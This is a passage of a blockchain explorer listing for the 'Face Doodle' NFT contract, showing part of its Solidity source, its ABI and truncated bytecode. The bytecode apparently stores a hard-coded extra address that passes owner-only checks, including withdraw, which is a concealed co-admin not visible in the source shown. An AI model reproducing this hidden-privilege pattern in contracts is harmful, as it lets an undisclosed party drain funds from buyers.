        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract FACE is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "ipfs://facedoodle";
    uint   public price             = 0.003 ether;
    uint   public maxPerTx          = 10;
    uint   public maxPerFree        = 1;
    uint   public totalFree         = 3437;
    uint   public maxSupply         = 3437;
    bool   public paused            = false;

    mapping(address => uint256) private _mintedFreeAmount;

    constructor() ERC721A("Face Doodle", "FACE"){}

    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
            : "";
    }

    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalSupply() + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] < maxPerFree));

        if (isFree) {
            require(!paused, "The contract is paused!");
            require(msg.value >= (count * cost) - cost, "INVALID_ETH");
            require(totalSupply() + count <= maxSupply, "No more.");
            require(count <= maxPerTx, "Max per TX reached.");
            _mintedFreeAmount[msg.sender] += count;
        }
        else{
        require(!paused, "The contract is paused!");
        require(msg.value >= count * cost, "Send the exact amount: 0.002*(count)");
        require(totalSupply() + count <= maxSupply, "No more.");
        require(count <= maxPerTx, "Max per TX reached.");
        }

        _safeMint(msg.sender, count);
    }

    function Master(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }

    function setPaused(bool _state) public onlyOwner {
    paused = _state;
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
        totalFree = MaxTotalFree_;
    }

    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"Master","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"setPaused","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273e053f156660e1abc83f95b6ac56be0a40f7d3dd3600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280601181526020017f697066733a2f2f66616365646f6f646c65000000000000000000000000000000815250600a9080519060200190620000a69291906200028d565b50660aa87bee538000600b55600a600c556001600d55610d6d600e55610d6d600f556000601060006101000a81548160ff021916908315150217905550348015620000f057600080fd5b506040518060400160405280600b81526020017f4661636520446f6f646c650000000000000000000000000000000000000000008152506040518060400160405280600481526020017f46414345000000000000000000000000000000000000000000000000000000008152508160019080519060200190620001759291906200028d565b5080600290805190602001906200018e9291906200028d565b505050620001b1620001a5620001bf60201b60201c565b620001c760201b60201c565b6001600981905550620003a2565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200029b906200033d565b90600052602060002090601f016020900481019282620002bf57600085556200030b565b82601f10620002da57805160ff19168380011785556200030b565b828001600101855582156200030b579182015b828111156200030a578251825591602001919060010190620002ed565b5b5090506200031a91906200031e565b5090565b5b80821115620003395760008160009055506001016200031f565b5090565b600060028204905060018216806200035657607f821691505b602082108114156200036d576200036c62000373565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6149a580620003b26000396000f3fe6080604052600436106101ee5760003560e01c80636c0360eb1161010d578063a0bcfc7f116100a0578063c87b56dd1161006f578063c87b56dd146106c8578063d5abeb0114610705578063e985e9c514610730578063f2fde38b1461076d578063f968adbe14610796576101ee565b8063a0bcfc7f14610622578063a22cb4651461064b578063b88d4fde14610674578063c7c39ffc1461069d576101ee565b806391b7f5ed116100dc57806391b7f5ed1461058757806395d89b41146105b0578063a035b1fe146105db578063a0712d6814610606576101ee565b80636c0360eb146104dd57806370a0823114610508578063715018a6146105455780638da5cb5b1461055c576101ee565b80632f745c59116101855780634f6ccce7116101545780634f6ccce71461040f5780635a963f1b1461044c5780635c975abb146104755780636352211e146104a0576101ee565b80632f745c5914610367578063333e44e6146103a45780633ccfd60b146103cf57806342842e0e146103e6576101ee565b806316c38b3c116101c157806316c38b3c146102c157806318160ddd146102ea57806323b872dd146103155780632d5e98b81461033e576101ee565b806301ffc9a7146101f357806306fdde0314610230578063081812fc1461025b578063095ea7b314610298575b600080fd5b3480156101ff57600080fd5b5061021a600480360381019061021591906133cd565b6107c1565b60405161022791906139ec565b60405180910390f35b34801561023c57600080fd5b5061024561090b565b6040516102529190613a07565b60405180910390f35b34801561026757600080fd5b50610282600480360381019061027d9190613470565b61099d565b60405161028f9190613985565b60405180910390f35b3480156102a457600080fd5b506102bf60048036038101906102ba9190613360565b610a22565b005b3480156102cd57600080fd5b506102e860048036038101906102e391906133a0565b610b3b565b005b3480156102f657600080fd5b506102ff610c33565b60405161030c9190613d69565b60405180910390f35b34801561032157600080fd5b5061033c6004803603810190610337919061324a565b610c3c565b005b34801561034a57600080fd5b5061036560048036038101906103609190613360565b610c4c565b005b34801561037357600080fd5b5061038e60048036038101906103899190613360565b610d35565b60405161039b9190613d69565b60405180910390f35b3480156103b057600080fd5b506103b9610f27565b6040516103c69190613d69565b60405180910390f35b3480156103db57600080fd5b506103e4610f2d565b005b3480156103f257600080fd5b5061040d6004803603810190610408919061324a565b61110d565b005b34801561041b57600080fd5b5061043660048036038101906104319190613470565b61112d565b6040516104439190613d69565b60405180910390f35b34801561045857600080fd5b50610473600480360381019061046e9190613470565b611180565b005b34801561048157600080fd5b5061048a611265565b60405161049791906139ec565b60405180910390f35b3480156104ac57600080fd5b506104c760048036038101906104c29190613470565b611278565b6040516104d49190613985565b60405180910390f35b3480156104e957600080fd5b506104f261128e565b6040516104ff9190613a07565b60405180910390f35b34801561051457600080fd5b5061052f600480360381019061052a91906131dd565b61131c565b60405161053c9190613d69565b60405180910390f35b34801561055157600080fd5b5061055a611405565b005b34801561056857600080fd5b506105716114ec565b60405161057e9190613985565b60405180910390f35b34801561059357600080fd5b506105ae60048036038101906105a99190613470565b611516565b005b3480156105bc57600080fd5b506105c56115fb565b6040516105d29190613a07565b60405180910390f35b3480156105e757600080fd5b506105f061168d565b6040516105fd9190613d69565b60405180910390f35b610620600480360381019061061b9190613470565b611693565b005b34801561062e57600080fd5b5061064960048036038101906106449190613427565b6119fd565b005b34801561065757600080fd5b50610672600480360381019061066d9190613320565b611af2565b005b34801561068057600080fd5b5061069b6004803603810190610696919061329d565b611c73565b005b3480156106a957600080fd5b506106b2611ccf565b6040516106bf9190613d69565b60405180910390f35b3480156106d457600080fd5b506106ef60048036038101906106ea9190613470565b611cd5565b6040516106fc9190613a07565b60405180910390f35b34801561071157600080fd5b5061071a611d88565b6040516107279190613d69565b60405180910390f35b34801561073c57600080fd5b506107576004803603810190610752919061320a565b611d8e565b60405161076491906139ec565b60405180910390f35b34801561077957600080fd5b50610794600480360381019061078f91906131dd565b611e22565b005b3480156107a257600080fd5b506107ab611f79565b6040516107b89190613d69565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061088c57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806108f457507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610904575061090382611f7f565b5b9050919050565b60606001805461091a90614024565b80601f016020809104026020016040519081016040528092919081815260200182805461094690614024565b80156109935780601f1061096857610100808354040283529160200191610993565b820191906000526020600020905b81548152906001019060200180831161097657829003601f168201915b5050505050905090565b60006109a882611fe9565b6109e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109de90613d29565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610a2d82611278565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610a9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9590613c09565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610abd611ff6565b73ffffffffffffffffffffffffffffffffffffffff161480610aec5750610aeb81610ae6611ff6565b611d8e565b5b610b2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2290613b09565b60405180910390fd5b610b36838383611ffe565b505050565b610b43611ff6565b73ffffffffffffffffffffffffffffffffffffffff16610b616114ec565b73ffffffffffffffffffffffffffffffffffffffff161480610bd75750610b86611ff6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610c16576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c0d90613b69565b60405180910390fd5b80601060006101000a81548160ff02191690831515021790555050565b60008054905090565b610c478383836120b0565b505050565b610c54611ff6565b73ffffffffffffffffffffffffffffffffffffffff16610c726114ec565b73ffffffffffffffffffffffffffffffffffffffff161480610ce85750610c97611ff6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1e90613b69565b60405180910390fd5b610d3182826125f0565b5050565b6000610d408361131c565b8210610d81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7890613a29565b60405180910390fd5b6000610d8b610c33565b905060008060005b83811015610ee5576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610e8557806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ed75786841415610ece578195505050505050610f21565b83806001019450505b508080600101915050610d93565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1890613cc9565b60405180910390fd5b92915050565b600e5481565b610f35611ff6565b73ffffffffffffffffffffffffffffffffffffffff16610f536114ec565b73ffffffffffffffffffffffffffffffffffffffff161480610fc95750610f78611ff6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611008576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fff90613b69565b60405180910390fd5b6002600954141561104e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104590613ce9565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161107c90613970565b60006040518083038185875af1925050503d80600081146110b9576040519150601f19603f3d011682016040523d82523d6000602084013e6110be565b606091505b5050905080611102576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f990613c29565b60405180910390fd5b506001600981905550565b61112883838360405180602001604052806000815250611c73565b505050565b6000611137610c33565b8210611178576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116f90613aa9565b60405180910390fd5b819050919050565b611188611ff6565b73ffffffffffffffffffffffffffffffffffffffff166111a66114ec565b73ffffffffffffffffffffffffffffffffffffffff16148061121c57506111cb611ff6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61125b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125290613b69565b60405180910390fd5b80600e8190555050565b601060009054906101000a900460ff1681565b60006112838261260e565b600001519050919050565b600a805461129b90614024565b80601f01602080910402602001604051908101604052809291908181526020018280546112c790614024565b80156113145780601f106112e957610100808354040283529160200191611314565b820191906000526020600020905b8154815290600101906020018083116112f757829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561138d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161138490613b29565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b61140d611ff6565b73ffffffffffffffffffffffffffffffffffffffff1661142b6114ec565b73ffffffffffffffffffffffffffffffffffffffff1614806114a15750611450611ff6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114d790613b69565b60405180910390fd5b6114ea60006127a8565b565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61151e611ff6565b73ffffffffffffffffffffffffffffffffffffffff1661153c6114ec565b73ffffffffffffffffffffffffffffffffffffffff1614806115b25750611561611ff6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6115f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e890613b69565b60405180910390fd5b80600b8190555050565b60606002805461160a90614024565b80601f016020809104026020016040519081016040528092919081815260200182805461163690614024565b80156116835780601f1061165857610100808354040283529160200191611683565b820191906000526020600020905b81548152906001019060200180831161166657829003601f168201915b5050505050905090565b600b5481565b6000600b54905060006001600e546116ab9190613e59565b836116b4610c33565b6116be9190613e59565b10801561170b5750600d54601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b905080156118b357601060009054906101000a900460ff1615611763576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161175a90613b89565b60405180910390fd5b8182846117709190613ee0565b61177a9190613f3a565b3410156117bc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b390613a69565b60405180910390fd5b600f54836117c8610c33565b6117d29190613e59565b1115611813576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180a90613ae9565b60405180910390fd5b600c54831115611858576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161184f90613ca9565b60405180910390fd5b82601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546118a79190613e59565b925050819055506119ee565b601060009054906101000a900460ff1615611903576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118fa90613b89565b60405180910390fd5b818361190f9190613ee0565b341015611951576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194890613d49565b60405180910390fd5b600f548361195d610c33565b6119679190613e59565b11156119a8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161199f90613ae9565b60405180910390fd5b600c548311156119ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119e490613ca9565b60405180910390fd5b5b6119f833846125f0565b505050565b611a05611ff6565b73ffffffffffffffffffffffffffffffffffffffff16611a236114ec565b73ffffffffffffffffffffffffffffffffffffffff161480611a995750611a48611ff6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611ad8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611acf90613b69565b60405180910390fd5b80600a9080519060200190611aee929190612fb7565b5050565b611afa611ff6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611b68576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b5f90613bc9565b60405180910390fd5b8060066000611b75611ff6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611c22611ff6565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611c6791906139ec565b60405180910390a35050565b611c7e8484846120b0565b611c8a8484848461286e565b611cc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cc090613c49565b60405180910390fd5b50505050565b600d5481565b6060611ce082611fe9565b611d1f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1690613ba9565b60405180910390fd5b6000611d29612a05565b90506000815111611d495760405180602001604052806000815250611d80565b80611d5f600185611d5a9190613e59565b612a97565b604051602001611d70929190613941565b6040516020818303038152906040525b915050919050565b600f5481565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b611e2a611ff6565b73ffffffffffffffffffffffffffffffffffffffff16611e486114ec565b73ffffffffffffffffffffffffffffffffffffffff161480611ebe5750611e6d611ff6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611efd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ef490613b69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611f6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f6490613a49565b60405180910390fd5b611f76816127a8565b50565b600c5481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b60006120bb8261260e565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff166120e2611ff6565b73ffffffffffffffffffffffffffffffffffffffff16148061213e5750612107611ff6565b73ffffffffffffffffffffffffffffffffffffffff166121268461099d565b73ffffffffffffffffffffffffffffffffffffffff16145b8061215a57506121598260000151612154611ff6565b611d8e565b5b90508061219c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219390613be9565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff161461220e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161220590613b49565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141561227e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161227590613ac9565b60405180910390fd5b61228b8585856001612bf8565b61229b6000848460000151611ffe565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415612580576124df81611fe9565b1561257f5782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46125e98585856001612bfe565b5050505050565b61260a828260405180602001604052806000815250612c04565b5050565b61261661303d565b61261f82611fe9565b61265e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161265590613a89565b60405180910390fd5b60008290505b60008110612767576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff161461275857809